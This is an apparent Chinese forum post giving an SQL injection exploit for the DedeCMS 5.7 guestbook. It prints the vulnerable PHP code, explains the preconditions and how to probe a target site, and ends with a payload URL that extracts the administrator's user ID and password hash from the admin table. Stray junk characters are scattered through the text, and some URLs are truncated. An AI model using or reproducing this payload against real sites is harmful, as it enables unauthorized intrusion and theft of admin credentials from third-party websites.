dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

6 V- Q6 v6 U) t漏洞文件edit.inc.php具体代码：

< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  

   

, X2 B! E$ s/ W* |* Q( \if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  

else $GUEST_BOOK_POS = "guestbook.php";  
/ {0 H1 k4 M# X
8 j+ Y6 s# v3 Y7 U/ P   

$id = intval($id);  
6 T5 Y) B9 B6 P
% M( N$ m& T3 J0 vif(empty($job)) $job='view';  

   

5 j" n1 b8 ?6 J) k! V. iif($job=='del' && $g_isadmin)  
# g1 O% o5 K# i3 c  ?
{  

& t, C( F9 Y" z$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  
0 l) N" z: J; v) s7 N
! \5 a5 d1 |- }! G# R# X& h$ {exit();  
7 [) f. o  f8 n' o0 M. B8 V' t
}  
% [' w$ M% j& L5 H5 g: D5 |
else if($job=='check' && $g_isadmin)  

* R+ E2 G4 _- }$ |{  
0 v9 i8 Q0 p0 u4 `6 Q6 \- }
! e' W) p+ C% v5 h7 K$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  
& H! [9 C/ I# D+ ?' a1 K5 T  K7 m
. W) x; {: u9 }* G! S" {: K% zShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

exit();  

}  
9 x* h4 |$ W- @" x9 @3 }, F! E
else if($job=='editok')  
# k( S% \5 b" g& D  I& ^! a  [3 d7 U
{  

+ Z3 _, `2 O2 Y) R; V1 Y$remsg = trim($remsg);  

if($remsg!='')  

: O8 S6 `' L( y  |) G) e/ u" {( \{  
$ ~; p. n9 o. e, {: k
//管理员回复不过滤HTML By:Errorera blog:errs.cc  
2 z0 _7 {- `: P4 e, D
% [1 U# E% A& K" s- Bif($g_isadmin)  

! m  o2 k# n- ?2 ?. c{  

$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  

" |9 E, z. D! \//$remsg <br /><font color=red>管理员回复：</font> }  
3 n7 N/ ^* O" C$ u8 u! s( O
else

7 U% C5 Y3 {2 f& F# a{  

' n, [6 x! _: J& `, \2 m6 e. \$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  

# [0 H& l; o* t$ a$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  

) A& W/ U2 `$ O; G1 f$msg = $oldmsg.$remsg;  

* [1 _& B  F* Q3 _8 a+ I2 v}  

1 \. ~! y) @" C# {}  

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  
% k! N- a; T6 v6 T; ~* O9 k
$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  
% C  f$ B- j5 C; s( f
7 h$ i$ d- O, L% J7 EShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  
' o( H$ v( B+ M$ M/ K8 i
exit();  

}  

//home:www.errs.cc  
) ^/ \( h0 {: `5 r$ ?& ]0 p" r
if($g_isadmin)  

8 |1 l3 U8 ~0 L) X" U; M# j2 q{  
, ~4 E: D. C) ^# X! S. k
$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  
0 u7 g/ d1 r1 _
! s1 N( N6 L1 i1 v4 _require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  
" p& T* v3 W/ x2 W: t7 A0 p- H
, W' ~- `# Q) a% M}  

else
9 P, x. E/ g1 c, @$ d
) V: J3 z7 _% u% h{  

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  
, G! J2 Q; D7 y- B6 i# m. W/ q
require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

- ?) z$ r1 ]" W( u( U9 c, t} 漏洞成功需要条件：
1. php magic_quotes_gpc=off
" \; {1 G: A5 D2 ]9 d; H* o2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
! u, k/ m  Z4 w/ k
6 N9 x0 ?" Y8 p; S* e1 ^8 l% @' W怎么判断是否存在漏洞：
) Z3 y# x% g9 s: b9 q  j先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
# w/ ?, @4 i1 i( Q7 z, m% {  e然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问：
* U1 Y6 e, k; L" w  {+ o
9 n% L. O/ `% ]7 g( Ywww.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
* K- v, h8 z+ ?8 F0 Q6 o' e" q跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证
& M9 Z8 R! Y% \- S/ D  Y
, L; z9 ^/ K& r& P3 x$ \
明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问

www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().

大概利用就是这样，大家有兴趣的多研究下！！

, G+ e* A- `  [% }+ v/ Z$ i- h最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！
: h4 P! ^! k4 P/ X
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='